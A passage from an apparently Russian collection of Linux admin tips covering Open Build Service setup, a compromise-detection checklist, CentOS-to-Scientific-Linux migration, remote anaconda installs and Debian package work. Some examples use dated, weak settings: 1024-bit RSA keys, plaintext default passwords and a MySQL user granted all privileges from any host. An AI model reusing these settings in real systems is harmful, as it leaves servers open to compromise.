/etc/dhcp/dhclient.d/dnsreg.sh #!/bin/sh dnsreg_config() { if [ -x /usr/bin/net ] ; then /usr/bin/net ads dns register -P 2>&1 | logger -p daemon.info -t dhclient fi true } 3. Не настроен сервер обновлений. У нас CentOS ставился для пробы перед покупкой RedHat-а, обновлять его как-то не планировалось. Благодарности
Руководству - за поставленную задачу и время, выделенное на её решение.
VMWare - за незначительное количество "особенностей" в эмуляторе, в целом просто невероятным образом сократившего время отладки.
Microsoft - за незабываемое время проведённое в борьбе с Active Directory.
Wireshark.org - за отличный инструмент борьбы со всем этим счастьем.

Установка Open Build Service и организация сборки пакетов для разных дистрибутивов Linux (доп. ссылка 1) Автор: Александр Молчанов [комментарии]

В заметке рассказано, как при помощи открытой платформы Open Build Service (OBS) упростить поддержку собственных репозиториев и организовать сборку бинарных пакетов для популярных дистрибутивов Linux. При водится пример установки в openSUSE 12.1 серверной части OBS и настройки клиентского окружения для сборки пакетов в Ubuntu. Установка сервера OBS Прежде всего, нужно убедиться, что подключен репозиторий oss (это основной репозиторий openSUSE, где находится только программное обеспечение с открытым кодом). Он необходим для установки таких пакетов как Apache2, MySQL-server и т.д. Добавим репозиторий для установки Open Build Server. zypper addrepo download.opensuse.org/distribution/12.1/repo/oss/ openSUSE-12.1-Oss sudo zypper addrepo zypper addrepo download.opensuse.org/repositories/openSUSE:/Tools:/Unstable/openSUSE_12.1/openSUSE:Tools:Unstable.repo sudo zypper refresh Теперь можно начать установку. sudo zypper in obs-server obs-api Установка потянет за собой пачку необходимых пакетов, таких как apache, mysql-server, rubygems и т.д. Всего примерно на 90Мб. Внесём пару изменений в файл конфигурации. Для этого открываем /etc/sysconfig/obs-server, находим и приводим их к следующему виду строки: OBS_SRC_SERVER="localhost:5352" OBS_REPO_SERVERS="localhost:5252" Теперь можно запускать сервисы: rcobsrepserver start rcobssrcserver start rcobsscheduler start rcobsdispatcher start rcobspublisher start Переходим к созданию баз данных и их наполнению: mysql> create database api_production; mysql> create database webui_production; mysql> create user 'obs'@'%' identified by 'obspassword'; mysql> create user 'obs'@'localhost' identified by 'obspassword'; mysql> GRANT all privileges ON api_production.* TO 'obs'@'%', 'obs'@'localhost'; mysql> GRANT all privileges ON webui_production.* TO 'obs'@'%', 'obs'@'localhost'; mysql> FLUSH PRIVILEGES; Настроим подключение к mysql API и WebUI. Для этого в любом удобном редакторе открываем файлы /srv/www/obs/api/config/database.yml и /srv/www/obs/webui/config/database.yml, находим и редактируем следующий блок: production: adapter: mysql2 database: api_production username: obs password: obspassword Наполним базы и установим необходимые права на папки tmp и log cd /srv/www/obs/api/ sudo RAILS_ENV="production" rake db:setup sudo chown -R wwwrun.www log tmp cd /srv/www/obs/webui/ sudo RAILS_ENV="production" rake db:setup sudo chown -R wwwrun.www log tmp Настроим Apache. Установим модуль apache2-mod_xforward. Для этого подключим ещё один репозиторий. zypper addrepo download.opensuse.org/repositories/openSUSE:/Tools/SLE_11/ Tools-SLE zypper refresh zypper in apache2-mod_xforward Подключим необходимые модули в /etc/sysconfig/apache2. APACHE_MODULES="... passenger rewrite proxy proxy_http xforward headers" Включим поддержку SSL и сгенерируем сертификаты: APACHE_SERVER_FLAGS="-DSSL" mkdir /srv/obs/certs openssl genrsa -out /srv/obs/certs/server.key 1024 openssl req -new -key /srv/obs/certs/server.key -out /srv/obs/certs/server.csr openssl x509 -req -days 365 -in /srv/obs/certs/server.csr -signkey /srv/obs/certs/server.key -out /srv/obs/certs/server.crt cat /srv/obs/certs/server.key /srv/obs/certs/server.crt > /srv/obs/certs/server.pem Установим use_xforward:true в /srv/www/obs/webui/config/options.yml и /srv/www/obs/api/config/options.yml Теперь один очень важный нюанс. Открываем файл /srv/www/obs/webui/config/environments/production.rb, ищем строчку CONFIG['frontend_host'] = "localhost" и вместо localhost пишем имя сервера, которое мы указали при генерации сертификата. Если этого не сделать, то при попытке открыть WebUI или API, будете получать ошибку "hostname does not match the server certificate". Перезапускаем Apache и OBS для применения изменений: rcapache2 restart rcobsapidelayed restart Проверяем работоспособность. После перезапуска Apache API должен быть доступен по адресу servername:444. WebUI будет доступен по адресу servername. Логин и пароль по умолчанию Admin/opensuse. Подробно останавливаться на использовании WebUI не буду. Интерфейс интуитивно понятный и удобный. Использование клиента для сборки в OBS - OSC (openSUSE Build Service Commander) Данный пакет доступен практически для всех дистрибутивов Linux. С его помощью мы сможем создавать проекты, пакеты, загружать исходные файлы. Для установки в Ubuntu выполним: apt-get install osc Следующим шагом нужно создать файл конфигурации, который необходим для работы с нашим сервером. Создать его можно в автоматическом режиме, используя любую команду osc, к примеру, osc ls. Но проще создать в корне домашней директории файл .oscrc следующего содержания: [general] apiurl = https://servername:444 use_keyring = 0 [https://servername:444] user = Admin pass = opensuse keyring = 0 Вместо servername пишем имя своего сервера. Имя опять же должно совпадать с указанным во время создания сертификата, иначе получите ошибку "Certificate Verification Error: Peer certificate commonName does not match host" Проверяем подключение, выполнив команду osc ls (вывести листинг проектов). Принимаем сертификат. The server certificate failed verification Would you like to 0 - quit (default) 1 - continue anyways 2 - trust the server certificate permanently 9 - review the server certificate Enter choice [0129]: 2 Попробуем создать новый проект (MyProject - название вашего проекта): osc meta prj -e MyProject После этого откроется xml-файл конфигурации нового проекта, где вам нужно будет, как минимум, указать Title и Description. Здесь же можно раскомментировать строки, в которых указано под какую систему будут собираться пакеты в данном проекте. <project name="MyProject"> <title>MyProject</title> <description>MyTestProject</description> <person role="maintainer" userid="Admin" /> <person role="bugowner" userid="Admin" /> <publish> <disable /> </publish> <build> <enable /> </build> <debuginfo> <disable /> </debuginfo> <repository name="openSUSE_Factory"> <path project="openSUSE:Factory" repository="standard" /> <arch>x86_64</arch> <arch>i586</arch> </repository> <repository name="openSUSE_11.2"> <path project="openSUSE:11.2" repository="standard"/> <arch>x86_64</arch> <arch>i586</arch> </repository> <repository name="openSUSE_11.1"> <path project="openSUSE:11.1" repository="standard"/> <arch>x86_64</arch> <arch>i586</arch> </repository> <repository name="Fedora_12"> <path project="Fedora:12" repository="standard" /> <arch>x86_64</arch> <arch>i586</arch> </repository> <repository name="SLE_11"> <path project="SUSE:SLE-11" repository="standard" /> <arch>x86_64</arch> <arch>i586</arch> </repository> </project> Создание пакета происходит по такой же схеме (MyProject - название вашего проекта, MyPackage - ваш новый пакет) osc meta pkg -e MyProject MyPackage Теперь, когда проект и пакет созданы, нам нужно отправить на сервер файлы исходников, из которых будут собираться бинарные пакеты. Сначала создадим локальную копию проекта у себя на рабочей машине. osc co MyProject После этого должна появиться иерархия каталогов MyProject/MyPackage. Помещаем свои файлы исходников в каталог MyPackage, после чего добавляем их в контроль версий командой: osc add MyProject/MyPackage /MyFiles и закачиваем на сервер osc ci MyProject/MyPackage -m "Your comment" --skip-validation Результат сборки смотрим командой osc results MyProject/MyPackage Теперь приведу отдельно краткий перечень команд для работы с проектами и пакетами из консоли. Вывести список проектов: osc ls Создать проект: osc meta prj -e ProjectName Создать пакет: osc meta pkg -e ProjectName PackageName Удалить проект или пакет: osc rdelete ProjectName/PackageName Сделать локальную копию проекта: osc co ProjectName Добавить новые файлы в контроль версий: osc add ProjectName/PackageName/YourFiles Удалить исходные файлы: osc rremove ProjectName PackageName SourceName osc update ProjectName Подтвердить изменения в проекте: osc ci ProjectName -m "Your comment" --skip-validation Подтвердить изменения в пакете: osc ci Project Name/Package Name -m "Your comment" Показать результат сборки: osc results Project Name/Package Name Показать лог сборки (выполнять в каталоге пакета): osc buildlog Platform Arch (osc buildlog xUbuntu_12.04 i586)

Получение списка внешних .deb зависимостей для исполняемого файла Автор: Карбофос [комментарии]

Если программисту необходимо создать установочный пакет для Debian-подобных систем, необходимо указывать список внешних зависимостей (дополнительных пакетов необходимых для полноценного запуска бинарного файла). Команда для определения списка зависимостей с выдачей информации о версиях внешних deb пакетов: dpkg -l $( dpkg -S $( ldd YourBinaryOrLib | awk '{print $3}' ) | awk '{{sub(":"," ")} print $1}' ) где YourBinaryOrLib - имя собранного бинарного файла

Проверка Linux-системы на наличие следов взлома (доп. ссылка 1) (доп. ссылка 2) [комментарии]

В процессе разбора истории со взломом kernel.org было выявлено, что атаковавшим удалось установить вредоносное ПО на Linux-машины некоторых разработчиков, используя которое были перехвачены ключи доступа. В списке рассылки разработчиков ядра Linux опубликована краткая инструкция по проверке целостности системы и выявлению следов активности злоумышленников. Суть опубликованных рекомендаций изложена ниже. Одним из очевидных способов гарантировать чистоту системы от активности злоумышленников является переустановка системы с нуля. Но прежде чем прибегнуть к переустановке, следует убедиться, что система действительно поражена. Чтобы обеспечить выявление скрывающих свое присутствие руткитов проверку желательно выполнять загрузившись с LiveCD. 1. Установка и запуск специализированных инструментов для выявления руткитов, например, chkrootkit, ossec-rootcheck и rkhunter. При запуске утилиты rkhunter возможно ложное срабатывание на некоторых системах с Debian. Вызывающие ложные срабатывания факторы описаны в файле /usr/share/doc/rkhunter/README.Debian.gz 2. Проверка корректности сигнатур для всех установленных в системе пакетов. Для дистрибутивов на базе RPM: rpm --verify --all Для дистрибутивов с dpkg следует использовать скрипт: dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n; fi; done > ~/tmp.txt for f in `cat ~/tmp.txt`; do debsums -s -a $f; done Утилиту debsums следует установить отдельно: sudo apt-get install debsums Вывод измененных файлов: debsums -ca Вывод измененных файлов конфигурации: debsums -ce Посмотреть пакеты без контрольных сумм: debsums -l Другой вариант контрольных сумм для файлов в Debian: cd /var/lib/dpkg/info cat *.md5sums | sort > ~/all.md5 cd / md5sum -c ~/all.md5 > ~/check.txt 2>&1 3. Проверка на то, что установленные пакеты действительно подписаны действующими цифровыми подписями дистрибутива. Для систем на базе пакетного менеджера RPM: for package in `rpm -qa`; do sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package` if [ -z "$sig" ] ; then # check if there is a GPG key, not a PGP one sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package` if [ -z "$sig" ] ; then echo "$package does not have a signature!!!" fi fi done 4. При выявлении подозрительных пакетов их желательно удалить и установить заново. Например, для переустановки ssh в дистрибутивах на базе RPM следует выполнить: /etc/init.d/sshd stop rpm -e openssh zypper install openssh # для openSUSE yum install openssh # для Fedora Рекомендуется проделать эти операции, загрузившись с LiveCD и используя опцию 'rpm --root'. 5. Проверка целостности системных скриптов в /etc/rc*.d и выявление подозрительного содержимого в /usr/share. Эффективность выполнения проверок можно гарантировать только при загрузке с LiveCD. Для выявления директорий в /usr/share, которые не принадлежат каким-либо пакетам в дистрибутивах на базе RPM можно использовать следующий скрипт: for file in `find /usr/share/`; do package=`rpm -qf -- ${file} | grep "is not owned"` if [ -n "$package" ] ; then echo "weird file ${file}, please check this out" fi done В Debian для определения какому пакету принадлежит файл следует использовать "dpkg-query -S": for file in `find /usr/share/GeoIP`; do package=`dpkg-query -S ${file} 2>&1 | grep "not found"` if [ -n "$package" ] ; then echo "weird file ${file}, please check this out" fi done Аудит suid root программ: find / -user root -perm -4000 -ls 6. Проверка логов на предмет наличия нетипичных сообщений: * Проверить записи в wtmp и /var/log/secure*, обратив особое внимание на соединения с внешних хостов. * Проверить упоминание обращения к /dev/mem; * В /var/log/secure* посмотреть нет ли связанных с работой ssh строк с не текстовой информацией в поле версии, которые могут свидетельствовать о попытках взлома. * Проверка удаления файлов с логами, например, может не хватать одного файла с ротацией логов. * Выявление подозрительных соединений с локальной машины во вне, например, отправка email или попытки соединения по ssh во время вашего отсутствия. * Анализ логов пакетного фильтра с целью выявления подозрительных исходящих соединений. Например, даже скрытый руткитом бэкдор может проявить себя в логах через резолвинг DNS. Общая рекомендация сводится к контролю на промежуточном шлюзе соединений во вне для только принимающих внешние соединения машин и соединений из вне для только отправляющих запросы клиентских машин. 7. Если в процессе проверки обнаружен факт проникновения злоумышленника следует сделать копию дисковых разделов на отдельный носитель при помощи команды "dd" с целью более подробного анализа методов проникновения. Только после этого можно полностью переустановить всю систему с нуля. Одновременно нужно поменять все пароли и ключи доступа, уведомив об инциденте администраторов серверов, на которых осуществлялась удаленная работа.

Конвертация СentOS 6 в Scientific Linux 6 (доп. ссылка 1) (доп. ссылка 2) Автор: StormBP [комментарии]

Миграция с СentOS на Scientific Linux может быть целесообразна в свете доступности Scientific Linux 6.1, в то время как выпуск СentOS 6.1 лишь в планах. Перед началом миграции выполняем полное резервное копирование. 1. Устанавливаем репозитории Scientific Linux: rpm -ivh --force http://ftp.scientificlinux.org/linux/scientific/6x/x86_64/os/Packages/sl-release-6.1-2.x86_64.rpm 2. Чистим yum: yum clean all 3. Обновляем сам yum и rpm: yum update yum* rpm* 4. Обновляем систему: yum update 5. Удаляем лишнее: rpm -e centos-release rpm -e yum-plugin-fastestmirror 6. Синхронизируем пакеты из репозиториев: yum distro-sync 7. Переустанавливаем пакеты вендора CentOS: Выводим список пакетов: rpm -qa --qf "%{NAME} %{VENDOR}\n"|grep CentOS Для каждого пакета из списка выполняем: yum reinstall пакет 8. Перезагружаем систему: reboot

Удаленная установка CentOS или Fedora (доп. ссылка 1) Автор: Andrew Okhmat [комментарии]

Хочу поделиться способом удаленной установки CentOS или Fedora. Используя возможности инсталлятора anaconda, можно упростить процедуру инсталляции или обновления операционной системы на удаленном сервере. Цитата из русскоязычной страницы проекта раскрывает некоторые возможности anaconda, которые мы будем использовать: "Anaconda является достаточно современным установщиком. Он позволяет выполнять установку с локальных или удаленных источников, таких как CD и DVD, образы размещенных на жестких дисках, NFS, HTTP и FTP. Может быть создан сценарий установки с помощью kickstart для обеспечения полностью автоматической установки, позволяющей дублировать систему на ряд компьютеров. Установка может быть запущена через VNC на компьютерах без монитора." Все описанное ниже подходит для любого дистрибутива Linux, использующего для загрузки grub. Примеры из статьи тестировались на grub 0.97, но после небольших изменений можно использовать и с grub2. Более того, этот способ использовался мной для замены FreeBSD на Linux, после установки grub в качестве загрузчика вместо стандартного Boot Manager. Подготовка состоит из 4-х шагов:
Определение сетевых настроек сервера;
Загрузка образов для выбранной OS;
Подготовка конфигурации и добавление ее в grub.conf;
Перезагрузка сервера и подключение к нему через VNC. Определение сетевых настроек сервера Нам понадобится IP адреса сервера, шлюза и DNS. Также понадобится MAC адрес основной сетевой карты. Его важно указывать в параметрах, если на сервере 2 сетевых карты, иначе есть вероятность, что инсталлятор выберет вовсе не ту, которая нам нужна. Для определения сетевых настроек можно воспользоваться следующими командами: ifconfig ip route show cat /etc/sysconfig/network-scripts/ifcfg-eth0 cat /etc/sysconfig/network cat /etc/resolv.conf в нашем примере это: Ip 172.17.17.232 Gateway 172.17.17.1 DNS 172.17.17.1 MAC 52:54:00:4a:25:b5 Загрузка образов CentOS и Fedora используют разные образы для старта инсталлятора. Надо выбрать соответствующие образы, в зависимости от того какой дистрибутив мы собираемся установить. Кроме того, если вы хотите установить 32х битную версию, то в url вам нужно заменить x86_64 на i386. Образы для centos 5.6 (x86_64): wget -O /boot/vmlinuz_remote http://mirrors.supportex.net/centos/5.6/os/x86_64/isolinux/vmlinuz wget -O /boot/initrd_remote.img http://mirrors.supportex.net/centos/5.6/os/x86_64/isolinux/initrd.img Образы для fedora 15 (x86_64): wget -O /boot/vmlinuz_remote http://download.fedora.redhat.com/pub/fedora/linux/releases/15/Fedora/x86_64/os/isolinux/vmlinuz wget -O /boot/initrd_remote.img http://download.fedora.redhat.com/pub/fedora/linux/releases/15/Fedora/x86_64/os/isolinux/initrd.img Подготовка конфигурации и добавление ее в grub.conf Укажем ранее сохраненные ip адреса сервера, шлюза и днс, а также url, откуда инсталлятор будет скачивать rpm пакеты. Дополнительные параметры, например, отсутствие монитора, выбор определенной сетевой карты и пароль для VNC. Если /boot раздел на диске не первый, то поправьте строчку root(hd0,0), она должна соответствовать номеру раздела. Добавляем эти строки в grub.conf для Centos 5.6: title Remote Install root (hd0,0) kernel /vmlinuz_remote lang=en_US keymap=us \ method=http://mirrors.supportex.net/centos/5.6/os/x86_64/ \ vnc vncpassword=SuperSecret ip=172.17.17.232 netmask=255.255.255.0 gateway=172.17.17.1 \ dns=172.17.17.1 noselinux ksdevice=52:54:00:4a:25:b5 headless xfs panic=120 initrd /initrd_remote.img Или для fedora 15: title Remote Install root (hd0,0) kernel /vmlinuz_remote lang=en_US keymap=us \ method=http://download.fedora.redhat.com/pub/fedora/linux/releases/15/Fedora/x86_64/os/ \ vnc vncpassword=SuperSecret ip=172.17.17.232 netmask=255.255.255.0 gateway=172.17.17.1 \ dns=172.17.17.1 noselinux ksdevice=52:54:00:4a:25:b5 headless xfs panic=120 initrd /initrd_remote.img Предполагается, что наша конфигурация идет вторым пунктом меню. Мы указали grub попробовать загрузить ее один раз. Если что-то пойдет не так, вернемся к ранее установленному дистрибутиву после перезагрузки, через 120 секунд. # echo 'savedefault --default=1 --once' | grub --batch Более подробно о всех загрузочных параметрах анаконды вы можете прочитать на этой страничке: http://fedoraproject.org/wiki/Anaconda/Options Перезагрузка сервера и подключение к нему по VNC Перезагружаем сервер и ждем, когда он начнет отвечать на ping. Потребуется некоторое время, пока загружаются дополнительные пакеты и можно будет присоединиться через vnc. Если канал не очень быстрый, это может занять до 20-30 минут. Подключаемся к серверу и делаем все как на локальной консоли: vncviewer 172.17.17.232:1 Если вы работаете из Windows, то можете воспользоваться TightVNC. Советы VNC-сервер запускается без keep-a-live, поэтому если вы подключаетесь через nat, то при долгой неактивности есть шанс потерять сессию и больше не восстановить ее. Лучше отключаться от vnc, а потом подключаться повторно, если VNC консоль долго не используется. Не стоит форматировать бутовый раздел как ext4, хотя это предлагают по умолчанию как Fedora, так и Centos. В некоторых случаях установленная операционная система отказывается загружаться с этого раздела. И хотя это бывает крайне редко, но лучше не рисковать. При установке Fedora в минимальной конфигурации сервис network оказывается не активированным. Это можно починить, добавив в параметры anacond-ы sshd и sshpw=password, указав свой пароль для ssh. После окончания интерактивной установки, перед самой перезагрузкой инсталлятора, зайти по ssh на удаленный сервер и активировать сервис network: # chroot /mnt/sysimage # chkconfig network on # exit Ссылки How to use Kickstart (Anaconda's remote control) Anaconda Anaconda Boot Options Install Fedora 14 Linux without a monitor (headless), keyboard and CD/DVD Installing Fedora Using PXE Images

Подготовка патчей для пакетов Debian GNU/Linux (доп. ссылка 1) [комментарии]

При возникновении желания отправить исправление мейнтейнеру пакета Debian возникает вопрос, как правильно изменить код пакета и как отправить патч. 1. Получаем последнюю версию пакета с исходным кодом и устанавливаем необходимые для его сборки зависимости. Одним из методов является использование утилиты dget, входящей в состав пакета devscripts, которая позволяет напрямую загрузить пакет с исходным кодом по URL, который можно найти в dsc-файле, который можно загрузить из сисетмы трекинга пакетов. Если попытаться использовать apt-get, временами может быть выведено предупреждение, что пакет обслуживается в системе управления версиями: $ apt-get source wordpress [...] NOTICE: 'wordpress' packaging is maintained in the 'Git' version control system at: git://git.debian.org/git/collab-maint/wordpress.git [...] В этом случае следует использовать утилиту debcheckout для загрузки кода напрямую из репозитория системы управления версиями: $ debcheckout wordpress declared git repository at git://git.debian.org/git/collab-maint/wordpress.git git clone git://git.debian.org/git/collab-maint/wordpress.git wordpress ... Cloning into wordpress... Дополнительно рекомендуется установить мета-пакет packaging-dev, установка которого повлечет за собой установку наборов инструментов, полезных для разработчиков пакетов. 2. Внесение изменений. Для фиксации факта начала работы над внесением изменения в пакет пользователем, не являющимся мейнтейнером, выполним команду (NMU = Non Maintainer Upload): $ dch --nmu Этот шаг также позволит гарантировать, что после сборки пакета мы не перетрем загруженный ранее оригинальный пакет с исходными текстами. 2.1. Изменяем служебные файлы пакета. Заходим в поддиректорию debian и правим при необходимости нужные файлы. Внесенные изменения отражаем путем выполнения команды dch (если изменений несколько утилиту нужно запустить несколько раз). 2.2. Изменяем файлы оригинальной программы, поставляемой в пакете. При изменении файлов upstream-проекта имеет значение какой из форматов задействован в используемом пакете с исходными текстами ("1.0, "3.0 (quilt)" или "3.0 (native)", разница сводится к формированию одного большого патча или размещении каждого патча в отдельном файле), а также тип системы патчей (можно посмотреть запустив what-patch). В данной заметке рассматривается ситуация использования рекомендованного формата "3.0 (quilt)" (рекомендации будут работать и для формата "1.0", но для этого нужно настроить ~/.quiltrc в соответствии с инструкцией /usr/share/doc/quilt/README.source) Применяем в коду оригинального проекта все патчи, выполнив: $ quilt push -a Если патчей в пакете ещё нет, создаем вручную поддиректорию debian/patches: $ mkdir debian/patches 2.2.1. Импортируем существующий патч. Если изменения уже оформлены в upstream-проекте в виде патча, то импортировать данный патч можно следующим образом: $ quilt import -P fix-foobar.patch /tmp/patch Importing patch /tmp/patch (stored as fix-foobar.patch) $ quilt push Applying patch fix-foobar.patch [...] Now at patch fix-foobar.patch Опция "-P" позволяет выбрать на свое усмотрение имя для сохранения патча в директории debian/patches/. После выполнения указанных действий патч будет добавлен в директорию debian/patches/series, но пока не будет по умолчанию применен к коду. 2.2.1. Создаем новый патч. Если изменения еще не оформлены в виде патча, нужно указать quilt о необходимости создать новый патч: $ quilt new fix-foobar.patch Patch fix-foobar.patch is now on top Далее указываем все файлы, которые будут изменены в результате нашей деятельности. Для каждого изменяемого файла запускаем "quilt add", после чего quilt создаст для каждого из этих файлов резервную копию, на основе оценки изменений с которой в последствии будет сгенерирован патч. Теперь правим любым удобным способом нужные файлы. Если файлы планируется отредактировать вручную, вместо "quilt add" можно запустить "quilt edit". $ quilt edit foobar.c File foobar.c added to patch fix-foobar.patch После того как все изменения внесены, генерируем патч: $ quilt refresh Refreshed patch fix-foobar.patch 3. Тестируем внесенные изменения Собираем измененный пакет: $ debuild -us -uc проверяем его работоспособность, установив в систему через dpkg или debi. 4. Генерируем патч для отправки мейнтейнеру. После выполнения всех ранее указанных шагов в директории должно находиться два .dsc-файла, изначальный и новый, например: $ cd .. $ ls wordpress_*.dsc ../wordpress_3.0.5+dfsg-1.1.dsc ../wordpress_3.0.5+dfsg-1.dsc Сгенерировать патч для отправки мейнтейнеру можно командой debdiff: $ debdiff wordpress_3.0.5+dfsg-1.dsc wordpress_3.0.5+dfsg-1.1.dsc >/tmp/wp-debdiff Для отправки патча /tmp/wp-debdiff мейнтейнеру можно использовать утилиту bugreport, указав в роли тега "patch". Для автоматизации отправки можно использовать утилиту nmudiff. Если работа осуществлялась с копией из системы управления исходными текстами (выполняли debcheckout), то вместо debdiff можно сгенерировать diff-файл встроенными средствами используемой системы контроля версий (git diff, svn diff и т.п). В случае использования распределенной системы контроля версий (git, bzr, mercurial) возможно следует оформить все модификации в виде отдельного набора изменений. Вместо отправки одного патча, возможно потребуется отправить серию патчей или отправить URL на изменений в публичном репозитории.

Компиляция Linux-ядра под заданный процессор в Debian/Ubuntu (доп. ссылка 1) Автор: andrewlap [комментарии]

Пример компиляции ядра в таких дистрибутивах как Debian и Ubuntu с целью задействования всех возможных оптимизаций для текущего процессора (core-duo). Все произведённые действия подойдут для ubuntu 9.10 - 10.10 Для начала загрузим исходные тексты ядра и заголовочные файлы: sudo aptitude install linux-source-2.6 linux-headers Установим утилиты для компиляции ядра sudo aptitude install build-essential kernel-package libncurses-dev Полученное ядро нужно распаковать: cd /usr/src/ sudo tar -xjf linux-source-* Все операции с ядром производятся в корне директории с исходными текстами ядра, поэтому недолго думая переходим туда: cd /usr/src/linux-source-* Создадим файл конфигурации текущего ядра командой sudo make oldconfig Эта команда создаст файл .config, где будут указаны опции ядра, используемого в данной системе. Эти настройки будут основой для наших настроек. Приступим к конфигурации ядра: sudo make menuconfig С помощью этой утилиты указываем необходимые нам опции. Обращаю ваше внимание на следующую опцию: Processor type and features ---> Processor family Здесь выбираем свой процессор. Остальные опции, которые мы взяли из ядра идущего с дистрибутивом вполне работоспособны для большинства применений, поэтому изменяйте их по своему усмотрению, или оставляйте как есть. Далее, выполним команду, которая удалит файлы (если они имеются), оставшиеся от предыдущей компиляции: sudo make-kpkg clean Далее компилируем ядро командой: sudo nice -n 19 make-kpkg --initrd --append-to-version=-mykernel kernel_image kernel_headers "nice -n 19" понизит приоритет компиляции на 19 пунктов Ключ "-append-to-version" используется, чтобы добавить к имени файла образа ядра, который мы получим после компиляции, строку "-mykernel", чтобы было проще идентифицировать свое ядро. И, через несколько минут/часов или может у кого то и дней, мы получим оптимизированное для нашей архитектуры ядро. На Celeron 3.06GHz это заняло два с половиной часа. Если всё пройдёт удачно, в итоге в /usr/src/ получим два deb-пакета linux-headers-*.deb и linux-image-*.deb, которые следует установить в систему: sudo dpkg -i linux-headers-*.deb linux-image-*.deb Установщик также обновит конфигурацию grub и поставит новое ядро во главе списка. Теперь можно перезагрузить в систему с новым ядром! Дополнение от pavlinux: При необходимости можно внести изменения в используемые опции компиляции для gcc c оптимизацией под нужный процессор. Опции задаются через переменные окружения HOSTCFLAGS и KBUILD_CFLAGS, например: export HOSTCFLAGS="-O99 -mtune=native -funroll-all-loops" export KBUILD_CFLAGS="-O99 -mtune=native -funroll-all-loops" или могут быть заданы в основном Makefile через переменные "HOSTCFLAGS" и "HOSTCXXFLAGS". В этих настройках нельзя указывать флаги оптимизации под конкретный процессор, можно использовать отлько общие параметры оптимизации, такие как -06/-O99, -frecord-gcc-switches, -g0 -funroll-all-loops, -ftree-vectorize, -fno-inline-functions-called-once, -fmerge-all-constants и так далее. Для тонкой оптимизации под конкретный процессор нужно менять параметры в arch/x86/Makefile (под 32 бита в arch/x86/Makefile_32.cpu) там следует найти свой процессор, после строки "export BITS" есть тройка ifeq-else-endif Дописывать можно к последнему KBUILD_CFLAGS. Тут можно всё, кроме FPU/SSE/MMX/3DNOW, "-mcmodel=kernel" менять нельзя.

Удаление ненужных автоматически установленных пакетов в Debian и Ubuntu (доп. ссылка 1) [комментарии]

В процессе установки пакета, вместе с ним часто устанавливается и несколько зависимостей. Если после экспериментов данный пакет будет удален через команду "apt-get/aptitude remove" или через GUI-интерфейс, то дополнительно установленные зависимости останутся в системе, несмотря на то, что вызвавший их установку пакет уже удален и зависимости больше не используются. Для чистки подобных зависимостей удобно использовать команду "apt-get autoremove". Рассмотрим процесс чистки на примере. $ sudo apt-get install pino ... The following NEW packages will be installed: libdbusmenu-glib1 libgee2 libindicate4 libnotify1 notification-daemon pino ... Как видимо вместе с пакетом pino в систему будет установлено 4 новые библиотеки и демон нотификации. Всем этим пакетам будет присвоен флаг автоматической установки "automatically installed" Например: $ aptitude show libdbusmenu-glib1 Package: libdbusmenu-glib1 New: yes State: installed Automatically installed: yes Version: 0.3.7-1 ... Посмотреть все автоматически установленные пакеты можно командой: $ apt-mark showauto После удаления пакета pino через apt-get или synaptic все ранее установленные с ним дополнительные пакеты останутся в системе (aptitude удалит лишние зависимости при следующем запуске). $ sudo apt-get remove pino ... The following packages were automatically installed and are no longer required: notification-daemon libdbusmenu-glib1 libnotify1 libgee2 libindicate4 Use 'apt-get autoremove' to remove them. Для оценки более не используемых зависимостей и удаления тех, что имеют метку автоматической установки можно использовать команду: $ sudo apt-get autoremove The following packages will be REMOVED: libdbusmenu-glib1 libgee2 libindicate4 libnotify1 notification-daemon 0 upgraded, 0 newly installed, 5 to remove and 219 not upgraded. After this operation, 1307 kB disk space will be freed. Функцию удаления группы автоматически установленных пакетов можно использовать и при выполнении ручной чистки системы, для чего нужно вручную пометить ненужные пакеты, которые потом будут удалены при выполнении "apt-get autoremove", если они не присутствуют в списке зависимостей других пакетов. Это существенно снизит риск удаления нужного пакета по ошибке. Например, помечаем вручную библиотеку libxml-simple-perl: $ sudo apt-mark markauto libxml-simple-perl или $ sudo aptitude markauto libxml-simple-perl Тем не менее при маркировке нужно быть осторожным и не помечать первичные пакеты. Например, пометив пакет gnome и выполнив "apt-get autoremove" будет удалены все связанные с GNOME пакеты. Отменить пометку можно командой unmarkauto: $ sudo apt-mark unmarkauto gnome-session gnome-panel

Пересборка пакетов в Debian GNU/Linux (доп. ссылка 1) [комментарии]

Иногда в Debian Stable нужно установить более новую версию пакета из Testing, который не был перенесен в backports. 1. Загрузка пакета с исходными текстами Проверяем чтобы в /etc/apt/sources.list были активированы репозитории deb-src: deb-src http://ftp.debian.org/debian unstable main contrib non-free deb-src http://ftp.debian.org/debian testing main contrib non-free deb-src http://ftp.debian.org/debian stable main contrib non-free Для загрузки самых свежих исходных текстов пакета "publican" следует выполнить sudo apt-get update apt-get source publican Если необходимо установить исходные тексты пакета из определенной ветки дистрибутива, например, Debian Testing, что является разумным компромиссом между свежестью и стабильностью: apt-get source publican/testing Исходные тексты будут сохранены в текущую директорию: ls -dF publican* publican-2.1/ publican_2.1-2.dsc publican_2.1-2.debian.tar.gz publican_2.1.orig.tar.gz В случае, когда пакет отсутствует в репозиториях, загрузить пакет можно командой: dget -u dsc-url где dsc-url представляет собой URL к .dsc-файлу с описанием параметров пакета, опция "-u" указывает на отмену стадии проверки валидности пакета. Для получения утилиты dget нужно установить пакет. 2. Установка зависимостей Для установки пакетов, необходимых для сборки заданной программы, следует использовать команду "apt-get build-dep пакет", например: apt-get build-dep publican/testing Если пакет взят не из репозитория, то для выполнения аналогичного действия в директории с исходными текстами пакета нужно выполнить команду: dpkg-checkbuilddeps которая выведет список задействованных при сборке пакетов, которые затем нужно установить через "apt-get install". 3. Изменение исходных текстов перед сборкой При необходимости код собираемой программы можно модифицировать, например, приложить дополнительный патч или отредактировать debian/rules. При внесении изменений во избежание конфликтов рекомендуется изменить номер версии, используя команду dch из пакета devscripts: dch --local имя где "имя" является коротким именем, идентифицирующим вносящего изменение. После выполнения команды будет предложено указать комментарий для помещения в debian/changelog. 4. Сборка пакета Для сборки в директории с распакованным кодом выполняем команду debuild из пакета devscripts. cd publican-2.1 debuild -us -uc где опции "-us -uc" указывают пропустить связанный с проверкой сигнатур шаг, в случае если у сборщика отсутствует валидный GPG-ключ, совпадающий с данными вначале файла changelog. После завершения сборки в предыдущей директории можно будет найти бинарный пакет: cd .. ls -dF publican* publican-2.1/ publican_2.1-2rh1.dsc 